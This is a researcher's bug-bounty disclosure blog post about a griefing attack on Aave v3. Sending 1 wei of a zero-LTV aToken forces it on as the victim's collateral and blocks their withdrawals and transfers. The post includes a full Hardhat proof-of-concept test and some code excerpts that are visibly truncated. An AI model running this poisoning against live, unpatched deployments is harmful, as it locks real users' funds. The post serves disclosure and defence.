Aave v3 bug bounty part 3 — `LTV-0` `AToken` poison attack!

8 min readSep 3, 2023



Important Note: each of the issue I have found have been already fixed and deployed with the release of Aave 3.0.2

On May 15th 2023, Aave have officially released a post on their Governance forum to disclose different bug bounty submissions. Three of them have been submitted by me, and you can’t understand how much proud of myself I am right now!

For each issue that I have disclosed, I will create a blog post with an in-depth explanation about it. Let’s deep dive into the first one!

I don’t remember currently which snapshot of the GitHub codebase was deployed at the time of the bug bounty, so I’m going to pick one that is as much recent but that still contains the bug: https://github.com/aave/aave-v3-core/blob/94e571f3a7465201881a59555314cd550ccfda57

Summary of the issue

An attacker can poison a user by sending just 1 wei of an AToken with LTV equal to 0. When the victim has been poisoned, it won't be able to perform vital operations like withdraw, transfer or setUserUseReserveAsCollateral if such operations involve a non-0-LTV AToken.

Detailed explanation

With Aave v3, Aave has introduced a mechanic that allows them to set an AToken LTV to zero, reducing the borrowing power of the underlying asset.

When the user owns at least an AToken with LTV equal 0 and that AToken is used as collateral, Aave will restrict some of the interactions that the user can have with the protocol.

Let’s assume that the user is healthy (health factor >= 1) and that all the “normal” checks involved with each of the operations would pass. Let’s also assume that the user has also some borrow position opened.

With this context and those assumptions, these operations will revert

  • User tries to withdraw a non-0-LTV AToken via Pool.withdraw
  • User tries to transfer a non-0-LTV AToken via AToken.transfer
  • User attempt to set a non-0-LTV AToken as non-collateral Pool.setUserUseReserveAsCollateral

The “griefing attack” patterns are enabled by:

  • Aave allows the supply of 0-LTV AToken (this is not a requirement, the attacker could have already owned an asset that has then become a 0-LTV AToken)
  • Aave allows the transfer of 0-LTV AToken
  • Aave automatically set the AToken received by the receiver as collateral if the receiver does not own any balance of that token

Once received, the victim will experience all the reverts I previously described.

Let’s make a practical example

  • aDAI is an AToken with LTV equal to 0
  • Alice is the victim
  • Bob is the attacker
  • Alice supplies 100 AAVE to Aave
  • Alice supplies 1000 wETH to Aave
  • Alice borrows 100 USDC from Aave
  • Bob supplies 100 DAI to Aave

At this point, Bob (the attacker) sends 1 weiof aDAI to Alice, Aave allows the operation because Bob has no debt and there's nothing that prevents him from doing that. Because Alice does not own any aDAI, their new aDAI balance will be automatically set as collateral.

You can follow the execution of this procedure by looking at the code of Pool.finalizeTransfer that is called by AToken._transfer.

function finalizeTransfer(
address asset,
address from,
address to,
uint256 amount,
uint256 balanceFromBefore,
uint256 balanceToBefore
) external virtual override {
require(msg.sender == _reserves[asset].aTokenAddress, Errors.CALLER_NOT_ATOKEN);
asset: asset,
from: from,
to: to,
amount: amount,
balanceFromBefore: balanceFromBefore,
balanceToBefore: balanceToBefore,
reservesCount: _reservesCount,
oracle: ADDRESSES_PROVIDER.getPriceOracle(),
fromEModeCategory: _usersEModeCategory[from]

At this point, the function will call SupplyLogic.executeFinalizeTransfer

function executeFinalizeTransfer(
mapping(address => DataTypes.ReserveData) storage reservesData,
mapping(uint256 => address) storage reservesList,
mapping(uint8 => DataTypes.EModeCategory) storage eModeCategories,
mapping(address => DataTypes.UserConfigurationMap) storage usersConfig,
DataTypes.FinalizeTransferParams memory params
) external {
DataTypes.ReserveData storage reserve = reservesData[params.asset];
uint256 reserveId = reserve.id;
if (params.from != params.to && params.amount != 0) {
DataTypes.UserConfigurationMap storage fromConfig = usersConfig[params.from];
if (fromConfig.isUsingAsCollateral(reserveId)) {
if (fromConfig.isBorrowingAny()) {
if (params.balanceFromBefore == params.amount) {
fromConfig.setUsingAsCollateral(reserveId, false);
emit ReserveUsedAsCollateralDisabled(params.asset, params.from);
if (params.balanceToBefore == 0) {
DataTypes.UserConfigurationMap storage toConfig = usersConfig[params.to];
if (
) {
toConfig.setUsingAsCollateral(reserveId, true);
emit ReserveUsedAsCollateralEnabled(params.asset, params.to);

Even if the attacker would have something borrowed, the ValidationLogic.validateHFAndLtv done inside the fromConfig.isUsingAsCollateral(reserveId) would pass because the from (that is also owning an LTV-0 asset) is transferring an AToken that has reserve.configuration.getLtv() == 0 (see ValidationLogic.validateHFAndLtv).

Because the receiver does not own the AToken transferred, the ValidationLogic.validateUseAsCollateral will pass and the AToken will be set as collateral for the receiving user.

At this point, Alice will not be able anymore to

  • Withdraw her AAVE token previously supplied
  • Withdraw her wETH token previously supplied
  • Transfer her AAVE token previously supplied
  • Transfer her wETH token previously supplied
  • Set AAVE tokens as non-collateral
  • Set wETH tokens as non-collateral (in this very specific example it would fail because after the operation her HF would not be healthy, but this is not relevant for our example)

In general, as we said, all the withdrawal/transfer/set as non-collateral operations that do not involve a 0-LTV AToken would revert.

At this point, the only options that she can do to solve the problem are:

  • Withdraw the aDAI AToken
  • Transfer the aDAI AToken to someone else
  • (she could also set it as non-collateral, and we will see this option at the end, but I think that she should be able to “remove” the asset totally from her wallet if she really wanted)

As soon as one of those operations is done, Alice would not own anymore the “poisoned” AToken and as a consequence, Aave will set aDAI as non-collateral for Alice. Alice now can perform the operations that she couldn't do before (when "poisoned").

The attacker at this point can again send 1 wei of aDAI to Alice, and she would be poisoned again, and she would need to perform the withdrawal/transfer again. You can see that this is just an infinite loop of bad experiences for Alice.

The only thing that Alice can do is to:

  1. withdraw/transfer the “poisoned amount” and leave only (that’s simply what is needed) 1 wei of balance
  2. set the “poisoned AToken” as non-collateral

By owning at least 1 wei and having it set to non-collaral, the next time that the attacker transfers the “poisoned AToken”, Aave will not automatically set it as collateral.

Conclusions, possible solutions and suggestions

Here are some suggestions/possible solutions that Aave could apply to solve the issue

  • Do not automatically turn the received AToken as collateral (when the balance is 0) or at least do not do that if the received AToken is an AToken with LTV = 0.
  • Change the error code that is thrown in ValidationLogic.validateHFAndLtv to be more meaningful and different from the other instances of LTV_VALIDATION_FAILED reverts. This would allow the Aave website and integrators to better understand why it's failing

Test to showcase the griefing attack and the possible solution that the victim could adopt

import { expect } from 'chai';
import { BigNumber, utils } from 'ethers';
import { MAX_UINT_AMOUNT, ZERO_ADDRESS } from '../helpers/constants';
import { ProtocolErrors, RateMode } from '../helpers/types';
import { convertToCurrencyDecimals } from '../helpers/contracts-helpers';
import { makeSuite, SignerWithAddress, TestEnv } from './helpers/make-suite';
import { getReserveData, getUserData } from './helpers/utils/helpers';
import './helpers/utils/wadraymath';
import { AToken, evmRevert, evmSnapshot, MintableERC20, Pool, waitForTx, WETH9Mocked } from '@aave/deploy-v3';

makeSuite('POC AToken with LTV 0 Griefing attack', (testEnv: TestEnv) => {
const { INVALID_HF, LTV_VALIDATION_FAILED } = ProtocolErrors;
let snap: string;
before(async () => {
const { addressesProvider, oracle } = testEnv;
await waitForTx(await addressesProvider.setPriceOracle(oracle.address));
snap = await evmSnapshot();
after(async () => {
const { aaveOracle, addressesProvider } = testEnv;
await waitForTx(await addressesProvider.setPriceOracle(aaveOracle.address));
it('POC EXECUTION', async () => {
await evmRevert(snap);
snap = await evmSnapshot();
// Initial configuration
// DAI = AToken with LTV = 0
// AAVE = AToken with LTV > 0
// USDC = AToken with LTV > 0
// WETH = AToken with LTV > 0
const {
users: [user1, user2, user3, randomEOA, usdcSupplier],
} = testEnv;
// Set DAI as an underlying with LTV = 0
expect(await configurator.configureReserveAsCollateral(dai.address, 0, 8000, 10500))
.to.emit(configurator, 'CollateralConfigurationChanged')
.withArgs(dai.address, 0, 8000, 10500);
const ltv = (await helpersContract.getReserveConfigurationData(dai.address)).ltv;
// user2 supply some AAVE (AToken with LTV > 0) to later be able to set as non-collateral
const aaveSupplyAmount = utils.parseUnits('100', 18);
expect(await aave.connect(user2.signer)['mint(uint256)'](aaveSupplyAmount));
expect(await aave.connect(user2.signer).approve(pool.address, MAX_UINT_AMOUNT));
expect(await pool.connect(user2.signer).supply(aave.address, aaveSupplyAmount, user2.address, 0));
// user2 supplies 1000 WETH (AToken with LTV > 0)
const wethSupplyAmount = utils.parseUnits('1000', 18);
expect(await weth.connect(user2.signer)['mint(uint256)'](wethSupplyAmount));
expect(await weth.connect(user2.signer).approve(pool.address, MAX_UINT_AMOUNT));
expect(await pool.connect(user2.signer).supply(weth.address, wethSupplyAmount, user2.address, 0));
// usdcSupplier supply some USDC to allow user2 to borrow them
const usdcSupplyAmount = utils.parseUnits('1000', 6);
expect(await usdc.connect(usdcSupplier.signer)['mint(uint256)'](usdcSupplyAmount));
expect(await usdc.connect(usdcSupplier.signer).approve(pool.address, MAX_UINT_AMOUNT));
expect(await pool.connect(usdcSupplier.signer).supply(usdc.address, usdcSupplyAmount, usdcSupplier.address, 0));
// user2 borrow 100 USDC (AToken with LTV > 0)
const usdcToBorrow = utils.parseUnits('100', 6);
expect(await pool.connect(user2.signer).borrow(usdc.address, usdcToBorrow, RateMode.Variable, 0, user2.address));
// user1 mint some DAI (AToken with LTV == 0)
let daiSupplyAmount = utils.parseUnits('100', 18);
expect(await dai.connect(user1.signer)['mint(uint256)'](daiSupplyAmount));
expect(await dai.connect(user1.signer).approve(pool.address, MAX_UINT_AMOUNT));
expect(await pool.connect(user1.signer).supply(dai.address, daiSupplyAmount, user1.address, 0));
// user1 transfer 1 wei of those AToken to user 2
await aDai.connect(user1.signer).transfer(user2.address, 1);
// Test that the transfer/withdraw/set as non-collateral operations are not allowed when the victim owns a LTV-0 AToken
await performNotAllowedOperations(pool, weth, aWETH, aave, user2, user3);
// user2 decide to withdraw those LTV-0 Atoken -> balance 0, token set as non-collateral
await pool.connect(user2.signer).withdraw(dai.address, MAX_UINT_AMOUNT, user2.address);
expect(await dai.balanceOf(user2.address)).to.be.eq(1);
// Now user2 could perform the actions but the Griefing attack can be repeated
await aDai.connect(user1.signer).transfer(user2.address, 1);
// Test that the transfer/withdraw/set as non-collateral operations are not allowed when the victim owns a LTV-0 AToken
await performNotAllowedOperations(pool, weth, aWETH, aave, user2, user3);
// user2 decide to transfer to another address those LTV-0 Atoken -> balance 0, token set as non-collateral
await aDai.connect(user2.signer).transfer(randomEOA.address, 1);
expect(await aDai.balanceOf(user2.address)).to.be.eq(0);
expect(await aDai.balanceOf(randomEOA.address)).to.be.eq(1);
// Now user2 could perform the actions but the Griefing attack can be repeated
await aDai.connect(user1.signer).transfer(user2.address, 1);
// Test that the transfer/withdraw/set as non-collateral operations are not allowed when the victim owns a LTV-0 AToken
await performNotAllowedOperations(pool, weth, aWETH, aave, user2, user3);
// transfer the LTV-0 token just to "reset" the balance of the poisoned token and showcase
// what the user2 have to do to be able to be not-poisoned anymore in the future
await aDai.connect(user2.signer).transfer(randomEOA.address, 1);
// The only solution is to leave at least 1 wei of balance of the LTV-0 AToken and set them as non-collateral
daiSupplyAmount = utils.parseUnits('1', 18);
expect(await dai.connect(user2.signer)['mint(uint256)'](daiSupplyAmount));
expect(await dai.connect(user2.signer).approve(pool.address, MAX_UINT_AMOUNT));
// supply some DAI to be able to own the LTV-0 AToken
expect(await pool.connect(user2.signer).supply(dai.address, daiSupplyAmount, user2.address, 0));
// Set the LTV-0 AToken as non-collateral to prevent the problems
await pool.connect(user2.signer).setUserUseReserveAsCollateral(dai.address, false);
// now even if the attacker try to poison the user2 again, the DAI will not be-automatically set as collateral by Aave
// user1 transfer 1 wei of those AToken to user 2
await aDai.connect(user1.signer).transfer(user2.address, 1);
// And user2 will be able finally to perfroms those operations that were reverting before
// Try to perform the operations that were failing before
await pool.connect(user2.signer).withdraw(weth.address, 1, user2.address);
await aWETH.connect(user2.signer).transfer(user3.address, 1);
await pool.connect(user2.signer).setUserUseReserveAsCollateral(aave.address, false);
const performNotAllowedOperations = async (
pool: Pool,
weth: WETH9Mocked,
aWETH: AToken,
aave: MintableERC20,
victim: SignerWithAddress,
otherUser: SignerWithAddress
) => {
// user2 cannot withdraw non-LTV-0 collateral
await expect(pool.connect(victim.signer).withdraw(weth.address, 1, victim.address)).to.be.revertedWith(
// user2 cannot transfer non-LTV-0 AToken
await expect(aWETH.connect(victim.signer).transfer(otherUser.address, 1)).to.be.revertedWith(LTV_VALIDATION_FAILED);
// user2 cannot set as non-collateral non-LTV-0 AToken
await expect(pool.connect(victim.signer).setUserUseReserveAsCollateral(aave.address, false)).to.be.revertedWith(




Written by StErMi

#web3 dev + auditor | @SpearbitDAO security researcher, @yAcademyDAO resident auditor, @developer_dao #459, @TheSecureum bootcamp-0, @code4rena warden